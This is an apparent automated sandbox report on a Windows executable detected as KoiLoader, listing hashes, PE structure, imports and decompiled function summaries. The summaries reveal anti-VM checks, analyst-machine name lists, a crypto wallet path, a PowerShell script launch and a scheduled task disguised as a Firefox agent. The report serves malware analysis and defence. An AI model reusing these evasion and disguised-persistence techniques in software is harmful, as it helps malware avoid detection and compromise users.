HCA Information:	Successful, ratio: 96% Number of executed functions: 5 Number of non-executed functions: 68
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.861978800491604
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DWbCUTdGhV.exe
File size:	182'272 bytes
MD5:	13b4c5dff00cf1ea8a635743903e387f
SHA1:	de5d0e9a174171257a9539117d82659bbad98139
SHA256:	af816c7bf551987a9d5cfd0fa2237807eba659fa271fdab041357aa9e8969e51
SHA512:	1116a3069bb64adc88d1b1f153c4a533a0a2479a92ae81f1a2bc76a7b6ef92f3b1975f683c0a26b2c6fd479182506ff33cd37389a129bb03c77fca8496102271
SSDEEP:	3072:DCmlA+2TGMF85+bkRG32foUP9GmPe97UoenR6ftqgNbapWWmmE3aNZ:GmlV4h8JG3QUzeROHapWWk3aNZ
TLSH:	BC044AE2B1CC94F1D96A173308B266F8853CE4250BDB8ADFDF74087F9B641909572D2A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`J...$R..$R..$R.j'S..$R.j!SE.$R.j S..$RHz S..$RHz'S..$RHz!S..$R.j%S..$R..%R..$REz-S..$REz.R..$R...R..$REz&S..$RRich..$R.......

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x403d44
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65D59C0C [Wed Feb 21 06:45:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007F8E2C6ECE1Ch
jmp 00007F8E2C6EC88Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041105Ch]
push dword ptr [ebp+08h]
call dword ptr [00411058h]
push C0000409h
call dword ptr [0041100Ch]
push eax
call dword ptr [00411014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00411060h]
test eax, eax
je 00007F8E2C6ECA17h
push 00000002h
pop ecx
int 29h
mov dword ptr [00418A78h], eax
mov dword ptr [00418A74h], ecx
mov dword ptr [00418A70h], edx
mov dword ptr [00418A6Ch], ebx
mov dword ptr [00418A68h], esi
mov dword ptr [00418A64h], edi
mov word ptr [00418A90h], ss
mov word ptr [00418A84h], cs
mov word ptr [00418A60h], ds
mov word ptr [00418A5Ch], es
mov word ptr [00418A58h], fs
mov word ptr [00418A54h], gs
pushfd
pop dword ptr [00418A88h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00418A7Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00418A80h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00418A8Ch], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [004189C8h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17690	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1a000	0x13c34	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0x1130	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16698	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x165d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfbea	0xfc00	f80c6e36c0496492e658927e9cbd2f9a	False	0.5602368551587301	data	6.555752738036374	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x6d0c	0x6e00	06a44f2522af6deb8eae500514137c22	False	0.4388494318181818	OpenPGP Public Key	4.883697607623019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x18000	0x163c	0xa00	b55402247df1a6c6692e0c2bccb8e505	False	0.1765625	data	2.3846615292625706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1a000	0x13c34	0x13e00	02f7b73a880f9bd377b5aaf6d8373feb	False	0.4514666863207547	data	4.810842986452613	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0x1130	0x1200	6250f4910a879ac182f4b8379731bb76	False	0.7437065972222222	data	6.405937874038831	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1a118	0x18c	data	English	United States	0.6464646464646465
RT_RCDATA	0x1a2a4	0x10	data	English	United States	1.5
RT_RCDATA	0x1a2b4	0x13800	data	English	United States	0.45199819711538464
RT_MANIFEST	0x2dab4	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	04:28:18
Start date:	08/10/2024
Path:	C:\Users\user\Desktop\DWbCUTdGhV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DWbCUTdGhV.exe"
Imagebase:	0x790000
File size:	182'272 bytes
MD5 hash:	13B4C5DFF00CF1EA8A635743903E387F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.2121629696.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.5%
Dynamic/Decrypted Code Coverage:	17.3%
Signature Coverage:	17.6%
Total number of Nodes:	1245
Total number of Limit Nodes:	9

Executed Functions

Function 011F8620 Relevance: 196.6, APIs: 73, Strings: 39, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 011F865E
StrStrIW.KERNELBASE(?,Hyper-V), ref: 011F867D
StrStrIW.SHLWAPI(?,VMWare), ref: 011F8693
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 011F86A9
StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 011F86BF
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 011F86D4
GetModuleHandleA.KERNEL32(kernel32), ref: 011F86DF
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F86F3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F86FE
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 011F872D
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 011F8740
GetFileAttributesW.KERNELBASE(?), ref: 011F874F
GetFileAttributesW.KERNEL32(?), ref: 011F8761

Strings

%systemroot%\System32\VBoxService.exe, xrefs: 011F8728
7, xrefs: 011F8B49
Wow64DisableWow64FsRedirection, xrefs: 011F86ED
VMWare, xrefs: 011F8687
PJones, xrefs: 011F8B9D
kernel32, xrefs: 011F86DA
%systemroot%\System32\VBoxTray.exe, xrefs: 011F873B
doc, xrefs: 011F8D1C
Parallels Display Adapter, xrefs: 011F869D
Joe Cage, xrefs: 011F8B88
xls, xrefs: 011F8D37
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 011F8ACC
These.docx, xrefs: 011F87ED
Paul Jones, xrefs: 011F8B96
WILLCARTER-PC, xrefs: 011F8BF9
Wow64RevertWow64FsRedirection, xrefs: 011F86F5
OpenVPN.txt, xrefs: 011F8873
SFTOR-PC, xrefs: 011F8C09
%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 011F8B15
sal.rosenburg, xrefs: 011F8BB2
Recently.docx, xrefs: 011F87DC
STRAZNJICA.GRUBUTT, xrefs: 011F8B8F
Are.docx, xrefs: 011F87F4
Resource.txt, xrefs: 011F8864
@, xrefs: 011F8C32
new songs.txt, xrefs: 011F8A1E
FORTI-PC, xrefs: 011F8C02
BAIT, xrefs: 011F89B8, 011F89CA
Opened.docx, xrefs: 011F87E3
Hyper-V, xrefs: 011F8670
xlsx, xrefs: 011F8D43
WDAGUtilityAccount, xrefs: 011F8BAB
7, xrefs: 011F8AC2
powershell.exe, xrefs: 011F8DB6
Harry Johnson, xrefs: 011F8BA4
Files.docx, xrefs: 011F87FB
docx, xrefs: 011F8D2B
d5.vc/g, xrefs: 011F8BDF
Red Hat QXL controller, xrefs: 011F86B3

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$Are.docx$BAIT$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$PJones$Parallels Display Adapter$Paul Jones$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
API String ID: 4266617301-2422100297
Opcode ID: deccb596b24863f1598f33d1a64e42838a4ff02d63d98ad7fb643db1a5148cf1
Instruction ID: 6045deaadda832a885c696d2711ab9d9927b75404574003f4333df999664147b
Opcode Fuzzy Hash: deccb596b24863f1598f33d1a64e42838a4ff02d63d98ad7fb643db1a5148cf1
Instruction Fuzzy Hash: 91227F71900219ABDF299BA8CC48BEE7BBCBF45710F14466DE624F2180E7349A85CF64

Function 00791300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 0079132A
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00791343
GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00791439
GetProcAddress.KERNEL32(00000000), ref: 00791440
LoadLibraryA.KERNELBASE(?), ref: 00791459

Strings

kernel32, xrefs: 00791325, 00791434
LoadLibraryA, xrefs: 0079142F

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
String ID: LoadLibraryA$kernel32
API String ID: 3393750808-970291620
Opcode ID: 5de4592cb9f707bab4f9edde7cd1b9a6400ec85a4a5198ed713568af76cdd487
Instruction ID: d6f7580c4574d1fe1e419664212cb40a3a49298bf958b4dc2207757fe63f95ea
Opcode Fuzzy Hash: 5de4592cb9f707bab4f9edde7cd1b9a6400ec85a4a5198ed713568af76cdd487
Instruction Fuzzy Hash: 6FD1F674E0021ADFDF08CF98D894AEEB7B2FF88304F548159E506AB395D738A991CB54

Function 00792F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LPtoDP.GDI32(00000000,000C2BFF,020ECD74), ref: 00792F77
GetLastError.KERNEL32 ref: 00792F81
ExitProcess.KERNEL32 ref: 00792F8E
BuildCommDCBAndTimeoutsA.KERNEL32(jhl46745fghb,00000000,00000000), ref: 00792F9D
GetCurrentProcess.KERNEL32(00000000), ref: 00792FA9
TerminateProcess.KERNEL32(00000000), ref: 00792FB0

Strings

jhl46745fghb, xrefs: 00792F98

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
String ID: jhl46745fghb
API String ID: 3772419538-1856006033
Opcode ID: 346c00d549692a1965fd24a5229cb04167829fbe8a02dec95897f187af158f90
Instruction ID: c1dd6e967050888c45a0715b4473842b6eb5940541103b5e7d379936af9c62c9
Opcode Fuzzy Hash: 346c00d549692a1965fd24a5229cb04167829fbe8a02dec95897f187af158f90
Instruction Fuzzy Hash: EB015234A00348EBEB20EFA0ED0AB9E7774AF46741F408098E506A6191DF7C9944DB55

Function 011F8DD0 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultLangID.KERNEL32 ref: 011F8DD6
ExitProcess.KERNEL32 ref: 011F8E7E

Part of subcall function 011F8620: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 011F865E
Part of subcall function 011F8620: StrStrIW.KERNELBASE(?,Hyper-V), ref: 011F867D
Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,VMWare), ref: 011F8693
Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 011F86A9
Part of subcall function 011F8620: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 011F86BF
Part of subcall function 011F8620: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 011F86D4
Part of subcall function 011F8620: GetModuleHandleA.KERNEL32(kernel32), ref: 011F86DF
Part of subcall function 011F8620: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 011F86F3
Part of subcall function 011F8620: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 011F86FE
Part of subcall function 011F8620: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 011F872D
Part of subcall function 011F8620: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 011F8740
Part of subcall function 011F8620: GetFileAttributesW.KERNELBASE(?), ref: 011F874F
Part of subcall function 011F8620: GetFileAttributesW.KERNEL32(?), ref: 011F8761

Part of subcall function 011F8340: InitializeCriticalSection.KERNEL32(011FA080), ref: 011F8362
Part of subcall function 011F8340: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 011F838F
Part of subcall function 011F8340: StringFromGUID2.OLE32(?,?,00000080), ref: 011F83E8
Part of subcall function 011F8340: wsprintfA.USER32 ref: 011F83FF
Part of subcall function 011F8340: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 011F8413
Part of subcall function 011F8340: GetLastError.KERNEL32 ref: 011F841E
Part of subcall function 011F8340: WSAStartup.WS2_32(00000202,?), ref: 011F845C
Part of subcall function 011F8340: CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 011F8475
Part of subcall function 011F8340: CryptAcquireContextA.ADVAPI32(011FA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 011F8491

Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104), ref: 011F7191
Part of subcall function 011F7170: lstrlenW.KERNEL32(?), ref: 011F719A
Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104), ref: 011F71B5
Part of subcall function 011F7170: GetSystemWow64DirectoryW.KERNEL32(?,00000104), ref: 011F71C3
Part of subcall function 011F7170: GetLastError.KERNEL32 ref: 011F71CD
Part of subcall function 011F7170: ExpandEnvironmentStringsW.KERNEL32(%ProgramData%\agent.js,?,00000104), ref: 011F71E4
Part of subcall function 011F7170: wnsprintfW.SHLWAPI ref: 011F71FE
Part of subcall function 011F7170: SetFileAttributesW.KERNEL32(?,00000006), ref: 011F721E

Part of subcall function 011F8F40: CryptGenRandom.ADVAPI32(00000020,?), ref: 011F8F58
Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F8FB5
Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F8FBC
Part of subcall function 011F8F40: wsprintfA.USER32 ref: 011F8FEF
Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9028
Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F902B
Part of subcall function 011F8F40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 011F9030
Part of subcall function 011F8F40: HeapFree.KERNEL32(00000000), ref: 011F9033

Part of subcall function 011F7650: LsaOpenPolicy.ADVAPI32(00000000,011FA060,00000001,?), ref: 011F768C
Part of subcall function 011F7650: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 011F769F
Part of subcall function 011F7650: GetProcessHeap.KERNEL32(00000008,?), ref: 011F76BB
Part of subcall function 011F7650: HeapAlloc.KERNEL32(00000000), ref: 011F76C2
Part of subcall function 011F7650: LsaFreeMemory.ADVAPI32(?), ref: 011F76FC
Part of subcall function 011F7650: LsaClose.ADVAPI32(?), ref: 011F7705
Part of subcall function 011F7650: GetComputerNameW.KERNEL32(?,?), ref: 011F7724
Part of subcall function 011F7650: GetUserNameW.ADVAPI32(?,00000101), ref: 011F7735

Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 011F8551
Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 011F8564
Part of subcall function 011F8530: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 011F8577
Part of subcall function 011F8530: GetFileAttributesW.KERNEL32(?), ref: 011F859D
Part of subcall function 011F8530: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 011F85CD
Part of subcall function 011F8530: wnsprintfW.SHLWAPI ref: 011F85F0
Part of subcall function 011F8530: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 011F8612

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandHeapStrings$Process$AttributesFileFree$Crypt$AcquireAddressContextDevicesDisplayEnumErrorInformationLastNamePolicyProcUserwnsprintfwsprintf$AllocCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInitializeLangMemoryModuleMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWow64lstrcpylstrlen
String ID:
API String ID: 1304186597-0
Opcode ID: 0bae34a8fe3871f83da55bbfae38b75a8a71724d18d24410af19453062cce085
Instruction ID: 6f4f6a30d1230a3739f5f33b17eb5c18ed6172723262dd2ce792de2220361d5c
Opcode Fuzzy Hash: 0bae34a8fe3871f83da55bbfae38b75a8a71724d18d24410af19453062cce085
Instruction Fuzzy Hash: 17017D5C68611206FF3C795C90242BC394ADFD4265FC8812E9BE647DEA8F240E87026F

Function 00791710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00791110: GetModuleHandleA.KERNEL32(kernel32), ref: 0079111B
Part of subcall function 00791110: GetModuleHandleW.KERNEL32(00000000), ref: 00791162

GetUserDefaultLCID.KERNELBASE ref: 00791824

Memory Dump Source

Source File: 00000000.00000002.2120492102.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true

Associated: 00000000.00000002.2120475614.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120516539.00000000007A1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120582076.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2120630482.00000000007AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_790000_DWbCUTdGhV.jbxd

Similarity

API ID: HandleModule$DefaultUser
String ID:
API String ID: 3008646163-0
Opcode ID: b267cef1017148316758061a5e1f138abf90cad64625fba847ec0e24261af25d
Instruction ID: 1ae3121c739be935ea29dfe2dbc5337152efd7a86a6964fc56ead3736ef20059
Opcode Fuzzy Hash: b267cef1017148316758061a5e1f138abf90cad64625fba847ec0e24261af25d
Instruction Fuzzy Hash: CD4115B5E0020ADFCF04DF98E885AEEB7B5BF48304F548559E505A7341D738AA51CFA1

Non-executed Functions

Function 011F6BC0 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 011F6BDE
CoCreateInstance.OLE32(011F1020,00000000,00000001,011F1000,?,?,76230EE0), ref: 011F6C0B
SysAllocString.OLEAUT32(011F1498), ref: 011F6C51
SysFreeString.OLEAUT32(?), ref: 011F6C8E
SysAllocString.OLEAUT32(\Mozilla), ref: 011F6C9F
SysFreeString.OLEAUT32(00000000), ref: 011F6CC1
SysAllocString.OLEAUT32(\Mozilla), ref: 011F6CD2
SysFreeString.OLEAUT32(00000000), ref: 011F6CE8
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6CF6
SysFreeString.OLEAUT32(00000000), ref: 011F6D07
SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 011F6D44
SysFreeString.OLEAUT32(00000000), ref: 011F6D53
SysAllocString.OLEAUT32(Mozilla), ref: 011F6D5A
SysFreeString.OLEAUT32(00000000), ref: 011F6D69
SysAllocString.OLEAUT32(PT0S), ref: 011F6DBE
SysFreeString.OLEAUT32(00000000), ref: 011F6DCD
SysAllocString.OLEAUT32(Trigger1), ref: 011F6E3F
SysFreeString.OLEAUT32(00000000), ref: 011F6E4E
SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 011F6E55
SysFreeString.OLEAUT32(00000000), ref: 011F6E64
SysAllocString.OLEAUT32(PT1M), ref: 011F6E83
SysFreeString.OLEAUT32(00000000), ref: 011F6E92
SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 011F6F13
SysFreeString.OLEAUT32(00000000), ref: 011F6F22
SysAllocString.OLEAUT32(?), ref: 011F6F2C
SysFreeString.OLEAUT32(00000000), ref: 011F6F3B
VariantInit.OLEAUT32(?), ref: 011F6F6A
SysAllocString.OLEAUT32(011F113C), ref: 011F6F7E
SysAllocString.OLEAUT32(Firefox Default Browser Agent 458046B0AF4A39CB), ref: 011F6F8F
SysFreeString.OLEAUT32(00000000), ref: 011F6FCC
VariantClear.OLEAUT32(?), ref: 011F6FD2

Strings

Firefox Default Browser Agent 458046B0AF4A39CB, xrefs: 011F6CF1, 011F6F80
PT0S, xrefs: 011F6DB9
Trigger1, xrefs: 011F6E3A
C:\Windows\System32\wscript.exe, xrefs: 011F6F0E
The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic, xrefs: 011F6D3F
PT1M, xrefs: 011F6E7E
Mozilla, xrefs: 011F6D55
2023-01-01T12:00:00, xrefs: 011F6E50
\Mozilla, xrefs: 011F6C9A, 011F6CCD

Memory Dump Source

Source File: 00000000.00000002.2121111372.00000000011F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Associated: 00000000.00000002.2121071666.00000000011F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2121201628.00000000011FB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11f0000_DWbCUTdGhV.jbxd

Yara matches

Similarity

API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 458046B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
API String ID: 3904693211-711907784
Opcode ID: a50e518b965601424750a52615e8c91f0b23071fe0d0f884c4f8e62ab0030e8d
Instruction ID: 89af38c3a03844883b2286bf25489a15e2fe35b8e781009dc0db39b3732d7b7a
Opcode Fuzzy Hash: a50e518b965601424750a52615e8c91f0b23071fe0d0f884c4f8e62ab0030e8d
Instruction Fuzzy Hash: FBF1F871A00219AFDB14DFA9C948FAEBBB8FF49304F10415CF609EB251DB71A945CB61

